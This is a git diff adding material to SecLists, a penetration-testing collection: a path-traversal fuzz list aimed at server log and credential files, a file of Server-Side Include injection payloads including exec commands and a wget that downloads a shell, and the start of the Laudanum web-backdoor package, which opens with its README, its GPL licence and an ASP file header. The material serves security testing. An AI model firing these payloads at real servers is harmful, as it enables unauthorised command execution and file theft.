||||||
|
/var/log/apache/access_log
|
||||||
|
/var/log/apache/access.log
|
||||||
|
../../../../../../../var/log/apache/access_log
|
||||||
|
../../../../../../../var/log/apache/access.log
|
||||||
|
../../../../../var/log/apache/access_log
|
||||||
|
../../../../../var/log/apache/access.log
|
||||||
|
/var/log/apache/error_log
|
||||||
|
/var/log/apache/error.log
|
||||||
|
../../../../../../../var/log/apache/error_log
|
||||||
|
../../../../../../../var/log/apache/error.log
|
||||||
|
../../../../../var/log/apache/error_log
|
||||||
|
../../../../../var/log/apache/error.log
|
||||||
|
/var/log/apache-ssl/access.log
|
||||||
|
/var/log/apache-ssl/error.log
|
||||||
|
/var/log/auth
|
||||||
|
/var/log/authlog
|
||||||
|
/var/log/auth.log
|
||||||
|
/var/log/boot.log
|
||||||
|
/var/log/cron.log
|
||||||
|
/var/log/dmesg
|
||||||
|
/var/log/error_log
|
||||||
|
/var/log/error.log
|
||||||
|
../../../../../../../var/log/error_log
|
||||||
|
../../../../../../../var/log/error.log
|
||||||
|
../../../../../var/log/error_log
|
||||||
|
/var/log/exim_mainlog
|
||||||
|
/var/log/exim/mainlog
|
||||||
|
/var/log/exim_paniclog
|
||||||
|
/var/log/exim/paniclog
|
||||||
|
/var/log/exim_rejectlog
|
||||||
|
/var/log/exim/rejectlog
|
||||||
|
/var/log/ftplog
|
||||||
|
/var/log/ftp-proxy
|
||||||
|
/var/log/ftp-proxy/ftp-proxy.log
|
||||||
|
/var/log/httpd/
|
||||||
|
/var/log/httpd/access_log
|
||||||
|
/var/log/httpd/access.log
|
||||||
|
../../../../../var/log/httpd/access_log
|
||||||
|
/var/log/httpd/error_log
|
||||||
|
/var/log/httpd/error.log
|
||||||
|
../../../../../var/log/httpd/error_log
|
||||||
|
/var/log/httpsd/ssl.access_log
|
||||||
|
/var/log/httpsd/ssl_log
|
||||||
|
/var/log/kern.log
|
||||||
|
/var/log/lastlog
|
||||||
|
/var/log/lighttpd
|
||||||
|
/var/log/maillog
|
||||||
|
/var/log/message
|
||||||
|
/var/log/messages
|
||||||
|
/var/log/mysqlderror.log
|
||||||
|
/var/log/mysqld.log
|
||||||
|
/var/log/mysql.log
|
||||||
|
/var/log/mysql/mysql-bin.log
|
||||||
|
/var/log/mysql/mysql.log
|
||||||
|
/var/log/mysql/mysql-slow.log
|
||||||
|
/var/log/ncftpd.errs
|
||||||
|
/var/log/ncftpd/misclog.txt
|
||||||
|
/var/log/news
|
||||||
|
/var/log/news.all
|
||||||
|
/var/log/news/news
|
||||||
|
/var/log/news/news.all
|
||||||
|
/var/log/news/news.crit
|
||||||
|
/var/log/news/news.err
|
||||||
|
/var/log/news/news.notice
|
||||||
|
/var/log/news/suck.err
|
||||||
|
/var/log/news/suck.notice
|
||||||
|
/var/log/poplog
|
||||||
|
/var/log/POPlog
|
||||||
|
/var/log/proftpd
|
||||||
|
/var/log/proftpd.access_log
|
||||||
|
/var/log/proftpd.xferlog
|
||||||
|
/var/log/proftpd/xferlog.legacy
|
||||||
|
/var/log/pureftpd.log
|
||||||
|
/var/log/pure-ftpd/pure-ftpd.log
|
||||||
|
/var/log/qmail
|
||||||
|
/var/log/qmail/
|
||||||
|
/var/log/samba
|
||||||
|
/var/log/samba-log.%m
|
||||||
|
/var/log/secure
|
||||||
|
/var/log/smtpd
|
||||||
|
/var/log/spooler
|
||||||
|
/var/log/syslog
|
||||||
|
/var/log/telnetd
|
||||||
|
/var/log/thttpd_log
|
||||||
|
/var/log/utmp
|
||||||
|
/var/log/vsftpd.log
|
||||||
|
/var/log/wtmp
|
||||||
|
/var/log/xferlog
|
||||||
|
/var/log/yum.log
|
||||||
|
/var/lp/logs/lpNet
|
||||||
|
/var/lp/logs/lpsched
|
||||||
|
/var/lp/logs/requests
|
||||||
|
/var/mysql.log
|
||||||
|
/var/run/httpd.pid
|
||||||
|
/var/run/mysqld/mysqld.pid
|
||||||
|
/var/run/utmp
|
||||||
|
/var/saf/_log
|
||||||
|
/var/saf/port/log
|
||||||
|
/var/spool/errors
|
||||||
|
/var/spool/locks
|
||||||
|
/var/spool/logs
|
||||||
|
/var/spool/tmp
|
||||||
|
/var/www/conf/httpd.conf
|
||||||
|
/var/www/html/.htaccess
|
||||||
|
/var/www/localhost/htdocs/.htaccess
|
||||||
|
/var/www/log/access_log
|
||||||
|
/var/www/log/error_log
|
||||||
|
/../../var/www/logs/access_log
|
||||||
|
/var/www/logs/access_log
|
||||||
|
/var/www/logs/access.log
|
||||||
|
../../../../../../../var/www/logs/access_log
|
||||||
|
../../../../../../../var/www/logs/access.log
|
||||||
|
../../../../../var/www/logs/access.log
|
||||||
|
/var/www/logs/error_log
|
||||||
|
/var/www/logs/error.log
|
||||||
|
../../../../../../../var/www/logs/error_log
|
||||||
|
../../../../../../../var/www/logs/error.log
|
||||||
|
../../../../../var/www/logs/error_log
|
||||||
|
../../../../../var/www/logs/error.log
|
||||||
|
/var/www/sitename/htdocs/
|
||||||
|
/var/www/vhosts/sitename/httpdocs/.htaccess
|
||||||
|
/var/www/web1/html/.htaccess
|
||||||
|
/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
|
||||||
|
/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf
|
||||||
|
/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf
|
||||||
|
/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
|
||||||
|
/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
|
||||||
|
/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php
|
||||||
|
/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini
|
||||||
|
/Volumes/webBackup/opt/apache2/conf/httpd.conf
|
||||||
|
/Volumes/webBackup/private/etc/httpd/httpd.conf
|
||||||
|
/Volumes/webBackup/private/etc/httpd/httpd.conf.default
|
||||||
|
/web/conf/php.ini
|
||||||
|
/WINDOWS\php.ini
|
||||||
|
../../windows/win.ini
|
||||||
|
/WINNT\php.ini
|
||||||
|
/..\..\..\..\..\..\winnt\win.ini
|
||||||
|
/www/logs/proftpd.system.log
|
||||||
|
/xampp\apache\bin\php.ini
|
||||||
|
/.Xauthority
|
||||||
75
Fuzzing/JHADDIX_SSI_Injection.txt
Normal file
75
Fuzzing/JHADDIX_SSI_Injection.txt
Normal file
@@ -0,0 +1,75 @@
|
|||||||
|
<pre><!--#exec cmd="ls" --></pre>
|
||||||
|
<pre><!--#echo var="DATE_LOCAL" --> </pre>
|
||||||
|
<pre><!--#exec cmd="whoami"--></pre>
|
||||||
|
<pre><!--#exec cmd="dir" --></pre>
|
||||||
|
<!--#exec cmd="ls" -->
|
||||||
|
<!--#exec cmd="wget http://website.com/dir/shell.txt" -->
|
||||||
|
<!--#exec cmd="/bin/ls /" -->
|
||||||
|
<!--#exec cmd="dir" -->
|
||||||
|
<!--#exec cmd="cd C:\WINDOWS\System32">
|
||||||
|
<!--#config errmsg="File not found, informs users and password"-->
|
||||||
|
<!--#echo var="DOCUMENT_NAME" -->
|
||||||
|
<!--#echo var="DOCUMENT_URI" -->
|
||||||
|
<!--#config timefmt="A %B %d %Y %r"-->
|
||||||
|
<!--#fsize file="ssi.shtml" -->
|
||||||
|
<!--#include file=?UUUUUUUU...UU?-->
|
||||||
|
<!--#echo var="DATE_LOCAL" -->
|
||||||
|
<!--#exec cmd="whoami"-->
|
||||||
|
<!--#printenv -->
|
||||||
|
<!--#flastmod virtual="echo.html" -->
|
||||||
|
<!--#echo var="auth_type" -->
|
||||||
|
<!--#echo var="http_referer" -->
|
||||||
|
<!--#echo var="content_length" -->
|
||||||
|
<!--#echo var="content_type" -->
|
||||||
|
<!--#echo var="http_accept_encoding" -->
|
||||||
|
<!--#echo var="forwarded" -->
|
||||||
|
<!--#echo var="document_uri" -->
|
||||||
|
<!--#echo var="date_gmt" -->
|
||||||
|
<!--#echo var="date_local" -->
|
||||||
|
<!--#echo var="document_name" -->
|
||||||
|
<!--#echo var="document_root" -->
|
||||||
|
<!--#echo var="from" -->
|
||||||
|
<!--#echo var="gateway_interface" -->
|
||||||
|
<!--#echo var="http_accept" -->
|
||||||
|
<!--#echo var="http_accept_charset" -->
|
||||||
|
<!--#echo var="http_accept_language" -->
|
||||||
|
<!--#echo var="http_connection" -->
|
||||||
|
<!--#echo var="http_cookie" -->
|
||||||
|
<!--#echo var="http_form" -->
|
||||||
|
<!--#echo var="http_host" -->
|
||||||
|
<!--#echo var="user_name" -->
|
||||||
|
<!--#echo var="unique_id" -->
|
||||||
|
<!--#echo var="tz" -->
|
||||||
|
<!--#echo var="total_hits" -->
|
||||||
|
<!--#echo var="server_software" -->
|
||||||
|
<!--#echo var="server_protocol" -->
|
||||||
|
<!--#echo var="server_port" -->
|
||||||
|
<!--#echo var="server_name -->
|
||||||
|
<!--#echo var="server_addr" -->
|
||||||
|
<!--#echo var="server_admin" -->
|
||||||
|
<!--#echo var="script_url" -->
|
||||||
|
<!--#echo var="script_uri" -->
|
||||||
|
<!--#echo var="script_name" -->
|
||||||
|
<!--#echo var="script_filename" -->
|
||||||
|
<!--#echo var="netsite_root" -->
|
||||||
|
<!--#echo var="site_htmlroot" -->
|
||||||
|
<!--#echo var="path_translated" -->
|
||||||
|
<!--#echo var="path_info_translated" -->
|
||||||
|
<!--#echo var="request_uri" -->
|
||||||
|
<!--#echo var="request_method" -->
|
||||||
|
<!--#echo var="remote_user" -->
|
||||||
|
<!--#echo var="remote_addr" -->
|
||||||
|
<!--#echo var="http_client_ip" -->
|
||||||
|
<!--#echo var="remote_port" -->
|
||||||
|
<!--#echo var="remote_ident" -->
|
||||||
|
<!--#echo var="remote_host" -->
|
||||||
|
<!--#echo var="query_string_unescaped" -->
|
||||||
|
<!--#echo var="query_string" -->
|
||||||
|
<!--#echo var="path_translated" -->
|
||||||
|
<!--#echo var="path_info" -->
|
||||||
|
<!--#echo var="path" -->
|
||||||
|
<!--#echo var="page_count" -->
|
||||||
|
<!--#echo var="last_modified" -->
|
||||||
|
<!--#echo var="http_user_agent" -->
|
||||||
|
<!--#echo var="http_ua_os" -->
|
||||||
|
<!--#echo var="http_ua_cpu" -->
|
||||||
1617
Fuzzing/JHADDIX_XSS_WITH_CONTEXT.txt
Normal file
1617
Fuzzing/JHADDIX_XSS_WITH_CONTEXT.txt
Normal file
File diff suppressed because it is too large
Load Diff
6
README
6
README
@@ -1,6 +1,6 @@
|
|||||||
SecLists is a collection of multiple types of lists used during security assessments. List types include usernames, passwords, URLs, sensitive data grep strings, fuzzing payloads, and many more.
|
SecLists is a collection of multiple types of lists used during security assessments. List types include usernames, passwords, URLs, sensitive data grep strings, fuzzing payloads, and many more.
|
||||||
|
|
||||||
If you have any ideas for things we should include, please send them to daniel@danielmiessler.com. Also note that any lists that have been meticulously assembled by someone else will only be used with permission of the creator.
|
If you have any ideas for things we should include, please send them to daniel@danielmiessler.com or jhaddix@securityaegis.com. Also note that any lists that have been meticulously assembled by someone else will only be used with permission of the creator.
|
||||||
|
|
||||||
This project is maintained by Daniel Miessler and Jason Haddix.
|
This project is maintained by Daniel Miessler and Jason Haddix.
|
||||||
|
|
||||||
@@ -8,5 +8,9 @@ Credits:
|
|||||||
|
|
||||||
- Ron Bowes of SkullSecurity for collaborating and including all his lists here
|
- Ron Bowes of SkullSecurity for collaborating and including all his lists here
|
||||||
- Clarkson University for their research that led to the Clarkson list
|
- Clarkson University for their research that led to the Clarkson list
|
||||||
|
- All the authors listed in the XSS with context doc, which was found on pastebin and added to by us
|
||||||
|
- Ferruh Mavitina for the begginings of the LFI Fuzz list
|
||||||
|
- Adam Muntner and for the FuzzDB content, including all authors from the FuzzDB project
|
||||||
|
- Kevin Johnson for laudnaum shells
|
||||||
|
|
||||||
::
|
::
|
||||||
|
|||||||
BIN
Scripts/Backdoors/Web Backdoors/laudanum-0.8/._.DS_Store
Normal file
BIN
Scripts/Backdoors/Web Backdoors/laudanum-0.8/._.DS_Store
Normal file
Binary file not shown.
17
Scripts/Backdoors/Web Backdoors/laudanum-0.8/CREDITS
Normal file
17
Scripts/Backdoors/Web Backdoors/laudanum-0.8/CREDITS
Normal file
@@ -0,0 +1,17 @@
|
|||||||
|
The Team
|
||||||
|
========================================================
|
||||||
|
- Kevin Johnson
|
||||||
|
- Project Lead
|
||||||
|
|
||||||
|
- Justin Searle
|
||||||
|
- Core Developer
|
||||||
|
|
||||||
|
- Tim Medin
|
||||||
|
- Core Developer
|
||||||
|
|
||||||
|
- James Jardine
|
||||||
|
- Core Developer
|
||||||
|
|
||||||
|
Additional Coding
|
||||||
|
========================================================
|
||||||
|
- Robin Wood
|
||||||
258
Scripts/Backdoors/Web Backdoors/laudanum-0.8/GPL
Normal file
258
Scripts/Backdoors/Web Backdoors/laudanum-0.8/GPL
Normal file
@@ -0,0 +1,258 @@
|
|||||||
|
The GNU General Public License (GPL)
|
||||||
|
Version 2, June 1991
|
||||||
|
|
||||||
|
Copyright (C) 1989, 1991 Free Software Foundation, Inc.
|
||||||
|
59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
|
||||||
|
|
||||||
|
Everyone is permitted to copy and distribute verbatim copies
|
||||||
|
of this license document, but changing it is not allowed.
|
||||||
|
|
||||||
|
Preamble
|
||||||
|
|
||||||
|
The licenses for most software are designed to take away your freedom to share
|
||||||
|
and change it. By contrast, the GNU General Public License is intended to
|
||||||
|
guarantee your freedom to share and change free software--to make sure the
|
||||||
|
software is free for all its users. This General Public License applies to most
|
||||||
|
of the Free Software Foundation's software and to any other program whose
|
||||||
|
authors commit to using it. (Some other Free Software Foundation software is
|
||||||
|
covered by the GNU Library General Public License instead.) You can apply it to
|
||||||
|
your programs, too.
|
||||||
|
|
||||||
|
When we speak of free software, we are referring to freedom, not price. Our
|
||||||
|
General Public Licenses are designed to make sure that you have the freedom to
|
||||||
|
distribute copies of free software (and charge for this service if you wish),
|
||||||
|
that you receive source code or can get it if you want it, that you can change
|
||||||
|
the software or use pieces of it in new free programs; and that you know you can
|
||||||
|
do these things.
|
||||||
|
|
||||||
|
To protect your rights, we need to make restrictions that forbid anyone to deny
|
||||||
|
you these rights or to ask you to surrender the rights. These restrictions
|
||||||
|
translate to certain responsibilities for you if you distribute copies of the
|
||||||
|
software, or if you modify it.
|
||||||
|
|
||||||
|
For example, if you distribute copies of such a program, whether gratis or for
|
||||||
|
a fee, you must give the recipients all the rights that you have. You must make
|
||||||
|
sure that they, too, receive or can get the source code. And you must show them
|
||||||
|
these terms so they know their rights.
|
||||||
|
|
||||||
|
We protect your rights with two steps: (1) copyright the software, and (2)
|
||||||
|
offer you this license which gives you legal permission to copy, distribute
|
||||||
|
and/or modify the software.
|
||||||
|
|
||||||
|
Also, for each author's protection and ours, we want to make certain that
|
||||||
|
everyone understands that there is no warranty for this free software. If the
|
||||||
|
software is modified by someone else and passed on, we want its recipients to
|
||||||
|
know that what they have is not the original, so that any problems introduced
|
||||||
|
by others will not reflect on the original authors' reputations.
|
||||||
|
|
||||||
|
Finally, any free program is threatened constantly by software patents. We wish
|
||||||
|
to avoid the danger that redistributors of a free program will individually
|
||||||
|
obtain patent licenses, in effect making the program proprietary. To prevent
|
||||||
|
this, we have made it clear that any patent must be licensed for everyone's free
|
||||||
|
use or not licensed at all.
|
||||||
|
|
||||||
|
The precise terms and conditions for copying, distribution and modification
|
||||||
|
follow.
|
||||||
|
|
||||||
|
TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
|
||||||
|
|
||||||
|
0. This License applies to any program or other work which contains a notice
|
||||||
|
placed by the copyright holder saying it may be distributed under the terms of
|
||||||
|
this General Public License. The "Program", below, refers to any such program or
|
||||||
|
work, and a "work based on the Program" means either the Program or any
|
||||||
|
derivative work under copyright law: that is to say, a work containing the
|
||||||
|
Program or a portion of it, either verbatim or with modifications and/or
|
||||||
|
translated into another language. (Hereinafter, translation is included without
|
||||||
|
limitation in the term "modification".) Each licensee is addressed as "you".
|
||||||
|
|
||||||
|
Activities other than copying, distribution and modification are not covered by
|
||||||
|
this License; they are outside its scope. The act of running the Program is not
|
||||||
|
restricted, and the output from the Program is covered only if its contents
|
||||||
|
constitute a work based on the Program (independent of having been made by
|
||||||
|
running the Program). Whether that is true depends on what the Program does.
|
||||||
|
|
||||||
|
1. You may copy and distribute verbatim copies of the Program's source code as
|
||||||
|
you receive it, in any medium, provided that you conspicuously and appropriately
|
||||||
|
publish on each copy an appropriate copyright notice and disclaimer of warranty;
|
||||||
|
keep intact all the notices that refer to this License and to the absence of any
|
||||||
|
warranty; and give any other recipients of the Program a copy of this License
|
||||||
|
along with the Program.
|
||||||
|
|
||||||
|
You may charge a fee for the physical act of transferring a copy, and you may at
|
||||||
|
your option offer warranty protection in exchange for a fee.
|
||||||
|
|
||||||
|
2. You may modify your copy or copies of the Program or any portion of it, thus
|
||||||
|
forming a work based on the Program, and copy and distribute such modifications
|
||||||
|
or work under the terms of Section 1 above, provided that you also meet all of
|
||||||
|
these conditions:
|
||||||
|
|
||||||
|
a) You must cause the modified files to carry prominent notices stating that
|
||||||
|
you changed the files and the date of any change.
|
||||||
|
|
||||||
|
b) You must cause any work that you distribute or publish, that in whole or
|
||||||
|
in part contains or is derived from the Program or any part thereof, to be
|
||||||
|
licensed as a whole at no charge to all third parties under the terms of
|
||||||
|
this License.
|
||||||
|
|
||||||
|
c) If the modified program normally reads commands interactively when run,
|
||||||
|
you must cause it, when started running for such interactive use in the most
|
||||||
|
ordinary way, to print or display an announcement including an appropriate
|
||||||
|
copyright notice and a notice that there is no warranty (or else, saying
|
||||||
|
that you provide a warranty) and that users may redistribute the program
|
||||||
|
under these conditions, and telling the user how to view a copy of this
|
||||||
|
License. (Exception: if the Program itself is interactive but does not
|
||||||
|
normally print such an announcement, your work based on the Program is not
|
||||||
|
required to print an announcement.)
|
||||||
|
|
||||||
|
These requirements apply to the modified work as a whole. If identifiable
|
||||||
|
sections of that work are not derived from the Program, and can be reasonably
|
||||||
|
considered independent and separate works in themselves, then this License, and
|
||||||
|
its terms, do not apply to those sections when you distribute them as separate
|
||||||
|
works. But when you distribute the same sections as part of a whole which is a
|
||||||
|
work based on the Program, the distribution of the whole must be on the terms of
|
||||||
|
this License, whose permissions for other licensees extend to the entire whole,
|
||||||
|
and thus to each and every part regardless of who wrote it.
|
||||||
|
|
||||||
|
Thus, it is not the intent of this section to claim rights or contest your
|
||||||
|
rights to work written entirely by you; rather, the intent is to exercise the
|
||||||
|
right to control the distribution of derivative or collective works based on the
|
||||||
|
Program.
|
||||||
|
|
||||||
|
In addition, mere aggregation of another work not based on the Program with the
|
||||||
|
Program (or with a work based on the Program) on a volume of a storage or
|
||||||
|
distribution medium does not bring the other work under the scope of this
|
||||||
|
License.
|
||||||
|
|
||||||
|
3. You may copy and distribute the Program (or a work based on it, under
|
||||||
|
Section 2) in object code or executable form under the terms of Sections 1 and 2
|
||||||
|
above provided that you also do one of the following:
|
||||||
|
|
||||||
|
a) Accompany it with the complete corresponding machine-readable source
|
||||||
|
code, which must be distributed under the terms of Sections 1 and 2 above on
|
||||||
|
a medium customarily used for software interchange; or,
|
||||||
|
|
||||||
|
b) Accompany it with a written offer, valid for at least three years, to
|
||||||
|
give any third party, for a charge no more than your cost of physically
|
||||||
|
performing source distribution, a complete machine-readable copy of the
|
||||||
|
corresponding source code, to be distributed under the terms of Sections 1
|
||||||
|
and 2 above on a medium customarily used for software interchange; or,
|
||||||
|
|
||||||
|
c) Accompany it with the information you received as to the offer to
|
||||||
|
distribute corresponding source code. (This alternative is allowed only for
|
||||||
|
noncommercial distribution and only if you received the program in object
|
||||||
|
code or executable form with such an offer, in accord with Subsection b
|
||||||
|
above.)
|
||||||
|
|
||||||
|
The source code for a work means the preferred form of the work for making
|
||||||
|
modifications to it. For an executable work, complete source code means all
|
||||||
|
the source code for all modules it contains, plus any associated interface
|
||||||
|
definition files, plus the scripts used to control compilation and installation
|
||||||
|
of the executable. However, as a special exception, the source code distributed
|
||||||
|
need not include anything that is normally distributed (in either source or
|
||||||
|
binary form) with the major components (compiler, kernel, and so on) of the
|
||||||
|
operating system on which the executable runs, unless that component itself
|
||||||
|
accompanies the executable.
|
||||||
|
|
||||||
|
If distribution of executable or object code is made by offering access to copy
|
||||||
|
from a designated place, then offering equivalent access to copy the source code
|
||||||
|
from the same place counts as distribution of the source code, even though third
|
||||||
|
parties are not compelled to copy the source along with the object code.
|
||||||
|
|
||||||
|
4. You may not copy, modify, sublicense, or distribute the Program except as
|
||||||
|
expressly provided under this License. Any attempt otherwise to copy, modify,
|
||||||
|
sublicense or distribute the Program is void, and will automatically terminate
|
||||||
|
your rights under this License. However, parties who have received copies, or
|
||||||
|
rights, from you under this License will not have their licenses terminated so
|
||||||
|
long as such parties remain in full compliance.
|
||||||
|
|
||||||
|
5. You are not required to accept this License, since you have not signed it.
|
||||||
|
However, nothing else grants you permission to modify or distribute the Program
|
||||||
|
or its derivative works. These actions are prohibited by law if you do not
|
||||||
|
accept this License. Therefore, by modifying or distributing the Program (or any
|
||||||
|
work based on the Program), you indicate your acceptance of this License to do
|
||||||
|
so, and all its terms and conditions for copying, distributing or modifying the
|
||||||
|
Program or works based on it.
|
||||||
|
|
||||||
|
6. Each time you redistribute the Program (or any work based on the Program),
|
||||||
|
the recipient automatically receives a license from the original licensor to
|
||||||
|
copy, distribute or modify the Program subject to these terms and conditions.
|
||||||
|
You may not impose any further restrictions on the recipients' exercise of the
|
||||||
|
rights granted herein. You are not responsible for enforcing compliance by third
|
||||||
|
parties to this License.
|
||||||
|
|
||||||
|
7. If, as a consequence of a court judgment or allegation of patent infringement
|
||||||
|
or for any other reason (not limited to patent issues), conditions are imposed
|
||||||
|
on you (whether by court order, agreement or otherwise) that contradict the
|
||||||
|
conditions of this License, they do not excuse you from the conditions of this
|
||||||
|
License. If you cannot distribute so as to satisfy simultaneously your
|
||||||
|
obligations under this License and any other pertinent obligations, then as a
|
||||||
|
consequence you may not distribute the Program at all. For example, if a patent
|
||||||
|
license would not permit royalty-free redistribution of the Program by all those
|
||||||
|
who receive copies directly or indirectly through you, then the only way you
|
||||||
|
could satisfy both it and this License would be to refrain entirely from
|
||||||
|
distribution of the Program.
|
||||||
|
|
||||||
|
If any portion of this section is held invalid or unenforceable under any
|
||||||
|
particular circumstance, the balance of the section is intended to apply and the
|
||||||
|
section as a whole is intended to apply in other circumstances.
|
||||||
|
|
||||||
|
It is not the purpose of this section to induce you to infringe any patents or
|
||||||
|
other property right claims or to contest validity of any such claims; this
|
||||||
|
section has the sole purpose of protecting the integrity of the free software
|
||||||
|
distribution system, which is implemented by public license practices. Many
|
||||||
|
people have made generous contributions to the wide range of software
|
||||||
|
distributed through that system in reliance on consistent application of that
|
||||||
|
system; it is up to the author/donor to decide if he or she is willing to
|
||||||
|
distribute software through any other system and a licensee cannot impose that
|
||||||
|
choice.
|
||||||
|
|
||||||
|
This section is intended to make thoroughly clear what is believed to be a
|
||||||
|
consequence of the rest of this License.
|
||||||
|
|
||||||
|
8. If the distribution and/or use of the Program is restricted in certain
|
||||||
|
countries either by patents or by copyrighted interfaces, the original copyright
|
||||||
|
holder who places the Program under this License may add an explicit
|
||||||
|
geographical distribution limitation excluding those countries, so that
|
||||||
|
distribution is permitted only in or among countries not thus excluded. In such
|
||||||
|
case, this License incorporates the limitation as if written in the body of
|
||||||
|
this License.
|
||||||
|
|
||||||
|
9. The Free Software Foundation may publish revised and/or new versions of the
|
||||||
|
General Public License from time to time. Such new versions will be similar in
|
||||||
|
spirit to the present version, but may differ in detail to address new problems
|
||||||
|
or concerns.
|
||||||
|
|
||||||
|
Each version is given a distinguishing version number. If the Program specifies
|
||||||
|
a version number of this License which applies to it and "any later version",
|
||||||
|
you have the option of following the terms and conditions either of that version
|
||||||
|
or of any later version published by the Free Software Foundation. If the
|
||||||
|
Program does not specify a version number of this License, you may choose any
|
||||||
|
version ever published by the Free Software Foundation.
|
||||||
|
|
||||||
|
10. If you wish to incorporate parts of the Program into other free programs
|
||||||
|
whose distribution conditions are different, write to the author to ask
|
||||||
|
for permission. For software which is copyrighted by the Free Software
|
||||||
|
Foundation, write to the Free Software Foundation; we sometimes make exceptions
|
||||||
|
for this. Our decision will be guided by the two goals of preserving the free
|
||||||
|
status of all derivatives of our free software and of promoting the sharing and
|
||||||
|
reuse of software generally.
|
||||||
|
|
||||||
|
NO WARRANTY
|
||||||
|
|
||||||
|
11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR THE
|
||||||
|
PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED
|
||||||
|
IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS
|
||||||
|
IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT
|
||||||
|
NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
|
||||||
|
PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE
|
||||||
|
PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
|
||||||
|
ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
|
||||||
|
|
||||||
|
12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL
|
||||||
|
ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE THE
|
||||||
|
PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL,
|
||||||
|
SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY
|
||||||
|
TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING
|
||||||
|
RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF
|
||||||
|
THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER
|
||||||
|
PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
|
||||||
35
Scripts/Backdoors/Web Backdoors/laudanum-0.8/README
Normal file
35
Scripts/Backdoors/Web Backdoors/laudanum-0.8/README
Normal file
@@ -0,0 +1,35 @@
|
|||||||
|
Laudanum: Injectable Web Exploit Code v0.4
|
||||||
|
|
||||||
|
By Kevin Johnson <kjohnson@secureideas.net>
|
||||||
|
and the Laudanum Development Team
|
||||||
|
|
||||||
|
Project Website: http://laudanum.secureideas.net
|
||||||
|
Sourceforge Site: http://sourceforge.net/projects/laudanum
|
||||||
|
|
||||||
|
SVN : svn co https://laudanum.svn.sourceforge.net/svnroot/laudanum laudanum
|
||||||
|
|
||||||
|
-------------------------------------------------------------------------------
|
||||||
|
** Copyright (C) 2012 Kevin Johnson and the Laudanum Project Team
|
||||||
|
**
|
||||||
|
** This program is free software; you can redistribute it and/or modify
|
||||||
|
** it under the terms of the GNU General Public License as published by
|
||||||
|
** the Free Software Foundation; either version 2 of the License, or
|
||||||
|
** (at your option) any later version.
|
||||||
|
**
|
||||||
|
** This program is distributed in the hope that it will be useful,
|
||||||
|
** but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||||
|
** GNU General Public License for more details.
|
||||||
|
**
|
||||||
|
** You should have received a copy of the GNU General Public License
|
||||||
|
** along with this program; if not, write to the Free Software
|
||||||
|
** Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
|
||||||
|
-------------------------------------------------------------------------------
|
||||||
|
|
||||||
|
I. ABOUT
|
||||||
|
_____________________________________
|
||||||
|
Laudanum is a collection of injectable files, designed to be used in a pentest
|
||||||
|
when upload vulnerabilities, administrative interfaces, and SQL injection flaws
|
||||||
|
are found. These files are written in multiple languages for different
|
||||||
|
environments. They provide functionality such as shell, DNS query, LDAP
|
||||||
|
retrieval and others.
|
||||||
BIN
Scripts/Backdoors/Web Backdoors/laudanum-0.8/asp/._.DS_Store
Normal file
BIN
Scripts/Backdoors/Web Backdoors/laudanum-0.8/asp/._.DS_Store
Normal file
Binary file not shown.
153
Scripts/Backdoors/Web Backdoors/laudanum-0.8/asp/dns.asp
Normal file
153
Scripts/Backdoors/Web Backdoors/laudanum-0.8/asp/dns.asp
Normal file
@@ -0,0 +1,153 @@
|
|||||||
|
<%
|
||||||
|
' *******************************************************************************
|
||||||
|
' ***
|
||||||
|
' *** Laudanum Project
|
||||||
|
' *** A Collection of Injectable Files used during a Penetration Test
|
||||||
|
' ***
|
||||||
|
' *** More information is available at:
|
||||||
|
' *** http://laudanum.secureideas.net
|
||||||
|
' *** laudanum@secureideas.net
|
||||||
|
' ***
|
||||||
|
' *** Project Leads:
|
||||||
|
' *** Kevin Johnson <kjohnson@secureideas.net
|
||||||
|
' *** Tim Medin <tim@securitywhole.com>
|
||||||
|
' ***
|
||||||
|
' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
|
||||||
|
' ***
|
||||||
|
' ********************************************************************************
|
||||||
|
' ***
|
||||||
|
' *** This file provides access to DNS on the system.
|
||||||
|
' *** Written by Tim Medin <timmedin@gmail.com>
|
||||||
|
' ***
|
||||||
|
' ********************************************************************************
|
||||||
|
' *** This program is free software; you can redistribute it and/or
|
||||||
|
' *** modify it under the terms of the GNU General Public License
|
||||||
|
' *** as published by the Free Software Foundation; either version 2
|
||||||
|
' *** of the License, or (at your option) any later version.
|
||||||
|
' ***
|
||||||
|
